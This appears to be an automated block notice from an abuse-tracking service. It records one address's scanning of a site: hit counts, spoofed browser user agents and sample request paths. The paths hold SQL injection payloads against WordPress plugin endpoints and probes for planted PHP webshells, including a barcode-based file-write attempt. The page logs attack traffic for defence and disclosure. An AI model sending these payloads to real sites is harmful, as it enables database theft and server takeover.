abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 10
- Unique targets hit
- 1
- Unique paths probed
- 16
- Detection count
- 7
- First seen
- 2026-07-13 01:23:42 UTC
- Last seen
- 2026-07-13 01:48:48 UTC
- Block expires
- 2026-07-14 02:21:25 UTC
Sample paths probed
- /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g
- /wp-content/plugins/wpcargo/includes/3GPeDrOQzjZGtqdRAMq3UNALBCa.php?1=var_dump
- /?rest_route=/notificationx/v1/analytics
- /wp-content/uploads/pp-files/gftdj.php
- /
- /account/edit-profile/
- /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g
- /wp-admin/admin-ajax.php
- /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js
- /wp-content/plugins/wp-automatic/process_form.php
- /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g
- /wp-content/plugins/wpcargo/includes/3GPeDrOQzjZGtqdRAMq3UNALBCa.php
- /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=3GPeDrOQzjZGtqdRAMq3UNALBCa.php
- /wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)--+
- /wp-admin/
- /wp-login.php
Sample User-Agents
- Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.29 (KHTML, like Gecko) Version/17.7 Safari/617.29
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
- Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15
- Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20
- Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.1
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15
- Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
- Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
- Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15
- Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
- Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
- Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
- Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/10.0
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1 rv:6.0; vi-VN) AppleWebKit/535.6.1 (KHTML, like Gecko) Version/4.1 Safari/535.6.1
- Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.8
- Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.